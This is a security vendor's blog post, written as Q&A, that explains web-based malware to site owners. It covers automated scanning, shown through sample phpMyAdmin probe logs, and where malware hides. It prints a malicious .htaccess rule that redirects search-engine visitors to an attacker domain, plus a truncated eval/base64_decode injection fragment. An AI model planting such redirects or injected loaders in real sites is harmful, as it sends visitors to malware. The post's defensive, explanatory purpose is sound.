Ask Sucuri: Talk More About Web-Based Malware

If you have any questions about malware, blacklisting, or security in general, send it to us: contact@sucuri.net and we will answer here.

For all the “Ask Aucuri” answers, go here.

Question: My site got hacked and it is distributing malware. Why would anyone do that to me? I don’t know much about viruses on web sites. How do they work?

This is a question we get very often. How can a site have a “virus”? Where does it hide? How does it work? Why would anyone hack my site?

1- Why would anyone hack my site?
2- What can they gain by hacking my site?
3- How can they find my site and hack it?
4- Where can they hide the malware in my site?
5- How can you check if my site is hacked?


1- Why would anyone hack my site?

Is your site small? Very low page rank? Very few visitors? Or a big site with thousands of users?

It really doesn’t matter much to attackers. Most malware (and spam) attacks on websites are automated. The attackers crawl thousands of sites and check if they are vulnerable/outdated, and try to compromise them.

They often use search engines looking for specific plugin or software usage and try to compromise the sites found in there.

So, even if your site is small, it can still be found and hacked. Most of the time it is not a targeted attack against you, but you got mixed in as part of a large malware campaign.


2- I mean, seriously, why? What does anyone gain by hacking my site?

It depends on the goal of the attacker. In Blackhat seo spam campaigns, they compromise thousands of sites and insert links back to their own domains. Their gain is financial. This helps their own sites get a big boost in page rank and better results in search engines.

These types of tactics are also sold by some SEO companies to help their clients increase their page rank, and search engine visibility.

In other malware attacks their goals are a bit different. Some of them infect sites in order to compromise the desktops of the users visiting them. So the website compromise is just a tool helping the attacker to the goal of getting thousands of desktops under their control, which can then be used to steal credit card information, user info, botnets, etc).

In other cases, they hack websites to hide phishing attacks(fake bank/ credit card pages), or DoS (denial of service) attacks, or even spam mailer tools.

In the end, the benefits for the attacker can be huge. They get more usable resources, more back-links, and more visibility to their malware campaigns.


3- How can they find my site? Can you give an example?

Finding a compromised site is very easy, some attackers have lists with millions of sites that they scan and look for specific vulnerabilities to compromise. They can go to Alexa and get the top 1m sites and start from there.

Here is a simple example, look at these logs:

174.143.172.111 – - [01/Mar/2012:02:26:31 -0500] “GET /phpmyadmin/index.php HTTP/1.1″ 404 219 “-” “-”
174.143.172.111 – - [01/Mar/2012:02:26:31 -0500] “GET /phpmyadmin1/index.php HTTP/1.1″ 404 219 “-” “-”
219.129.216.34 – - [01/Mar/2012:10:55:00 -0500] “GET /phpmyadmin2/index.php HTTP/1.1″ 404 218 “-” “-”
219.129.216.34 – - [01/Mar/2012:10:55:01 -0500] “GET /mysqladmin/index.php HTTP/1.1″ 404 219 “-” “-”

Can you tell what is happening here? Someone is scanning a site and has found phpMyAdmin installed in multiple directories (phpmyadmin, pypmyadmin1, mysqladmin, etc).

Do you know what happens if they find it? They will try to compromise it using the latest vulnerabilities that were found on PHPMyAdmin. After that, well, they own the site to do anything they want.

*BTW, have you ever install phpMyAdmin on your site? And forgot it’s there? Better remove it or make sure it is updated, otherwise you can become one more victim of attacks targeting it.


4- So where is this web based malware hidden?

There are many types of web-based malware and they can be hidden in multiple places. The most common ones are:

.htaccess files

.htaccess allows you to control how your site will behave. You can configure redirections, PHP settings, and many other options using htaccess. Knowing this, do you see how useful it can be to an attacker?

What we see often is an attacker redirecting users coming from search engines (like Google or Bing) to another web site (generally using .ru, .in or free domains) where they will try to compromise the poor user. Example:

RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovusk…/in.php?g=916 [R,L]

See what it is doing? If you visit the site by typing it in the browser, nothing will happen. However, if you search for something on Google, and click on a link to this site, you get redirected to the bad domain.

Sneaky isn’t it? We call this type of attack conditional malware. In most cases, it is very hard for the site owner to detect since most owners typically visit their site(s) directly instead of searching for it via search engines. More details about .htaccess attacks here.

Index and other main files

These are very common. Attackers will inject iframes, remote javascript includes, and encoded content (eval followed by gzdecode, base64_decode, etc). Many times they restrict it by browser type, operating system and location to be harder to detect. Simple example:

eval ( base64_decode ( aWYoZnVuY3Rp….

Most of our malware posts talk about them if you want more details.

Other hidden places

These are just examples, but on WordPress sites we often see malware hidden inside themes, in legitimate plugins, or even acting like a legitimate plugin. You will also find these attackes targeting wp-config.php or even inside the database.

But that’s not it unfortunately. They can also use the php.ini, hide inside images, use cURL to download the bad content, and various other techniques to disguise what it is doing to make harder to find.

There are also backdoors. Oh backdoors, they can be hard to find. Backdoors are files inserted into a website to allow command and control capabilities. Although not malware specifically, they are inserted to give the attackers an entry point into the environment. Here is an example of a pretty dangerous backdoor we recently started finding.


5- How can I check if my site is compromised?

There is no easy answer for that question. Malware variates and hides so the threat always changes. We recommend trying our free malware scanner – Sucuri Sitecheck – It does a good job of indentifying most of these things.

Cleaning up the mess is not that simple either, but possible. You can hire professionals to assist, or give it a go on your own. If you are doing it on your own, I recommend starting clean. Backup your theme (templates) & plugin (modules) files, backup your database and configuration files. After that, remove everything else, and reinstall based on your backups (just make sure they are clean too).


We have just scratched the surface of web based malware, and we will be adding follow up posts with more details. Have any questions or comments? We are happy to answer them.

Scan your website for free:
About Daniel Cid

Daniel B. Cid is the CTO&Founder of Sucuri and the founder of the open source OSSEC HIDS. His interests range from intrusion detection, log analysis (log-based intrusion detection), web-based malware research and secure development.

You can find more about Daniel at his site dcid.me or on Twitter: @danielcid